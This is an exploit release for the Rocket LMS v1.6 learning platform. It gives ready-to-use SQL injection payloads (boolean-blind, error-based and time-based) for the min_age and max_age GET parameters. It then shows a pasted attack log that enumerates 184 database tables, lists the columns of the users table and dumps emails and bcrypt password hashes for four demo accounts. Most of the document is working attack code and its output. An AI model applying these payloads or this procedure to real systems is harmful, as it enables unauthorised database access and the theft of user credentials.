┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││                                     C r a C k E r                                    ┌┘
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                      [ Exploits ]                                    ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:  Author   : CraCkEr                        │ │                                         :
│  Website  : rocket-soft.org                │ │ Rocket LMS - Learning Management System │
│  Vendor   : RocketSoft                     │ │                                         │
│  Software : Rocket LMS v 1.6               │ │ is an online course marketplace with a  │
│  Vuln Type: Remote SQL Injection           │ │ pile of features that helps you to run  │
│  Method   : GET                            │ │ your online education business easily   │
│  Impact   : Database Access                │ │                                         │
│                                            │ │                                         │
│────────────────────────────────────────────┘ └─────────────────────────────────────────│
│                              B4nks-NET irc.b4nks.tk #unix                             ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:                                                                                        :
│  Release Notes:                                                                        │
│  ═════════════                                                                         │
│  Typically used for remotely exploitable vulnerabilities that can lead to              │
│  system compromise.                                                                    │
│                                                                                        │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                                                                      ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL   
	Ivo @palaziv
       
	CryptoJob (Twitter) twitter.com/CryptozJob
	   
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                    © CraCkEr 2022                                    ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘


GET parameter 'min_age' is vulnerable

---
Parameter: min_age (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=(SELECT (CASE WHEN (8536=8536) THEN 18 ELSE (SELECT 7625 UNION SELECT 1202) END))&max_age=99&day[]=saturday&min_time=&max_time=&country_id=

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18 AND GTID_SUBSET(CONCAT(0x71706a6271,(SELECT (ELT(1687=1687,1))),0x71786a6a71),1687)&max_age=99&day[]=saturday&min_time=&max_time=&country_id=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18 AND (SELECT 2819 FROM (SELECT(SLEEP(5)))SBYp)&max_age=99&day[]=saturday&min_time=&max_time=&country_id=
---


GET parameter 'max_age' is vulnerable

---
Parameter: max_age (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18&max_age=(SELECT (CASE WHEN (2763=2763) THEN 99 ELSE (SELECT 3665 UNION SELECT 7462) END))&day[]=saturday&min_time=&max_time=&country_id=

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18&max_age=99 AND GTID_SUBSET(CONCAT(0x71706a6271,(SELECT (ELT(5555=5555,1))),0x71786a6a71),5555)&day[]=saturday&min_time=&max_time=&country_id=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18&max_age=99 AND (SELECT 2169 FROM (SELECT(SLEEP(5)))mngI)&day[]=saturday&min_time=&max_time=&country_id=
---	
	

[+] Starting the Attack

[INFO] fetching current database
[INFO] the back-end DBMS is MySQL
web application technology: Apache 2, PHP 7.4.30
back-end DBMS: MySQL >= 5.6

current database: 'admin_learn'


[INFO] fetching tables for database: 'admin_learn'

Database: admin_learn
[184 tables]
+------------------------------------------------+
| groups                                         |
| accounting                                     |
| advertising_banners                            |
| advertising_banners_translations               |
| affiliates                                     |
| affiliates_codes                               |
| agora_history                                  |
| badge_translations                             |
| badges                                         |
| become_instructors                             |
| blog                                           |
| blog_categories                                |
| blog_translations                              |
| bundle_filter_option                           |
| bundle_translations                            |
| bundle_webinars                                |
| bundles                                        |
| cart                                           |
| categories                                     |
| category_translations                          |
| certificate_template_translations              |
| certificates                                   |
| certificates_templates                         |
| comments                                       |
| comments_reports                               |
| contacts                                       |
| course_forum_answers                           |
| course_forums                                  |
| course_learning                                |
| course_noticeboard_status                      |
| course_noticeboards                            |
| delete_account_requests                        |
| discount_categories                            |
| discount_courses                               |
| discount_groups                                |
| discount_users                                 |
| discounts                                      |
| faq_translations                               |
| faqs                                           |
| favorites                                      |
| feature_webinar_translations                   |
| feature_webinars                               |
| file_translations                              |
| files                                          |
| filter_option_translations                     |
| filter_options                                 |
| filter_translations                            |
| filters                                        |
| follows                                        |
| forum_featured_topics                          |
| forum_recommended_topic_items                  |
| forum_recommended_topics                       |
| forum_topic_attachments                        |
| forum_topic_bookmarks                          |
| forum_topic_likes                              |
| forum_topic_posts                              |
| forum_topic_reports                            |
| forum_topics                                   |
| forum_translations                             |
| forums                                         |
| group_users                                    |
| groups_registration_packages                   |
| home_sections                                  |
| jazzcash_transactions                          |
| meeting_times                                  |
| meetings                                       |
| migrations                                     |
| navbar_button_translations                     |
| navbar_buttons                                 |
| newsletters                                    |
| newsletters_history                            |
| noticeboards                                   |
| noticeboards_status                            |
| notification_templates                         |
| notifications                                  |
| notifications_status                           |
| offline_payments                               |
| order_items                                    |
| orders                                         |
| page_translations                              |
| pages                                          |
| password_resets                                |
| payku_payments                                 |
| payku_transactions                             |
| payment_channels                               |
| payouts                                        |
| payu_transactions                              |
| permissions                                    |
| prerequisites                                  |
| product_categories                             |
| product_category_translations                  |
| product_discounts                              |
| product_faq_translations                       |
| product_faqs                                   |
| product_file_translations                      |
| product_files                                  |
| product_filter_option_translations             |
| product_filter_options                         |
| product_filter_translations                    |
| product_filters                                |
| product_media                                  |
| product_orders                                 |
| product_reviews                                |
| product_selected_filter_options                |
| product_selected_specification_multi_values    |
| product_selected_specification_translations    |
| product_selected_specifications                |
| product_specification_categories               |
| product_specification_multi_value_translations |
| product_specification_multi_values             |
| product_specification_translations             |
| product_specifications                         |
| product_translations                           |
| products                                       |
| promotion_translations                         |
| promotions                                     |
| purchases                                      |
| quiz_question_translations                     |
| quiz_translations                              |
| quizzes                                        |
| quizzes_questions                              |
| quizzes_questions_answer_translations          |
| quizzes_questions_answers                      |
| quizzes_results                                |
| rating                                         |
| regions                                        |
| registration_packages                          |
| registration_packages_translations             |
| reserve_meetings                               |
| rewards                                        |
| rewards_accounting                             |
| roles                                          |
| sales                                          |
| sales_log                                      |
| sections                                       |
| session_reminds                                |
| session_translations                           |
| sessions                                       |
| setting_translations                           |
| settings                                       |
| special_offers                                 |
| subscribe_reminds                              |
| subscribe_translations                         |
| subscribe_uses                                 |
| subscribes                                     |
| support_conversations                          |
| support_department_translations                |
| support_departments                            |
| supports                                       |
| tags                                           |
| testimonial_translations                       |
| testimonials                                   |
| text_lesson_translations                       |
| text_lessons                                   |
| text_lessons_attachments                       |
| ticket_translations                            |
| ticket_users                                   |
| tickets                                        |
| trend_categories                               |
| users                                          |
| users_badges                                   |
| users_cookie_security                          |
| users_manual_purchase                          |
| users_metas                                    |
| users_occupations                              |
| users_registration_packages                    |
| users_zoom_api                                 |
| verifications                                  |
| webinar_assignment_attachments                 |
| webinar_assignment_history                     |
| webinar_assignment_history_messages            |
| webinar_assignment_translations                |
| webinar_assignments                            |
| webinar_chapter_items                          |
| webinar_chapter_translations                   |
| webinar_chapters                               |
| webinar_extra_description_translations         |
| webinar_extra_descriptions                     |
| webinar_filter_option                          |
| webinar_partner_teacher                        |
| webinar_reports                                |
| webinar_reviews                                |
| webinar_translations                           |
| webinars                                       |
+------------------------------------------------+


[INFO] fetching columns for table 'users' in database 'admin_learn'

Database: admin_learn
Table: users
[49 columns]

+--------------------+-------------------------------------+
| Column             | Type                                |
+--------------------+-------------------------------------+
| language           | varchar(255)                        |
| about              | text                                |
| access_content     | tinyint(1)                          |
| account_id         | varchar(128)                        |
| account_type       | varchar(128)                        |
| address            | varchar(255)                        |
| affiliate          | tinyint(1)                          |
| avatar             | varchar(255)                        |
| avatar_settings    | varchar(255)                        |
| ban                | tinyint(1)                          |
| ban_end_at         | int(10) unsigned                    |
| ban_start_at       | int(10) unsigned                    |
| bio                | varchar(128)                        |
| can_create_store   | tinyint(1)                          |
| certificate        | varchar(128)                        |
| city_id            | int(10) unsigned                    |
| commission         | int(10) unsigned                    |
| country_id         | int(10) unsigned                    |
| cover_img          | varchar(255)                        |
| created_at         | int(11)                             |
| deleted_at         | int(11)                             |
| district_id        | int(10) unsigned                    |
| email              | varchar(255)                        |
| facebook_id        | varchar(255)                        |
| financial_approval | tinyint(1)                          |
| full_name          | varchar(128)                        |
| google_id          | varchar(255)                        |
| headline           | varchar(255)                        |
| iban               | varchar(128)                        |
| id                 | int(10) unsigned                    |
| identity_scan      | varchar(128)                        |
| level_of_training  | bit(3)                              |
| location           | point                               |
| meeting_type       | enum('all','in_person','online')    |
| mobile             | varchar(32)                         |
| newsletter         | tinyint(1)                          |
| offline            | tinyint(1)                          |
| offline_message    | text                                |
| organ_id           | int(11)                             |
| password           | varchar(255)                        |
| province_id        | int(10) unsigned                    |
| public_message     | tinyint(1)                          |
| remember_token     | varchar(255)                        |
| role_id            | int(10) unsigned                    |
| role_name          | varchar(64)                         |
| status             | enum('active','pending','inactive') |
| timezone           | varchar(255)                        |
| updated_at         | int(11)                             |
| verified           | tinyint(1)                          |
+--------------------+-------------------------------------+


[INFO] fetching entries of column(s) 'account_id,account_type,email,id,password' for table 'users' in database 'admin_learn'

Database: admin_learn
Table: users
[4 entries]

+------+---------------+---------------------+-----------------------------+--------------------------------------------------------------+
| id   | account_id    | account_type        | email                       | password                                                     |
+------+---------------+---------------------+-----------------------------+--------------------------------------------------------------+
| 1    | NULL          | NULL                | admin@demo.com              | $2y$10$nSUg1Z2rltHGecudC6dEEeRoqfIhlHi8WaAFFQs57oyFtpkvvQufW |
| 867  | NULL          | NULL                | organization@demo.com       | $2y$10$W0.rfZgYCWGr/rOSrGrGg.Nnm6xBVdR3FYjJiXqiq6LZdx2Ds.aXq |
| 995  | NULL          | NULL                | student@demo.com            | $2y$10$Hc4OzTkL3i5vmHXXvZvSfOsZDMD/XYwO4yS8UOtUIAFQcXYhIIJsa |
| 1015 | NULL          | NULL                | instructor@demo.com         | $2y$10$8.jgtS/cg8L6HfuuBgWnkeg49r0LiY7kofR6eiY9b.mx747i82n.u |
+------+---------------+---------------------+-----------------------------+--------------------------------------------------------------+


[-] Done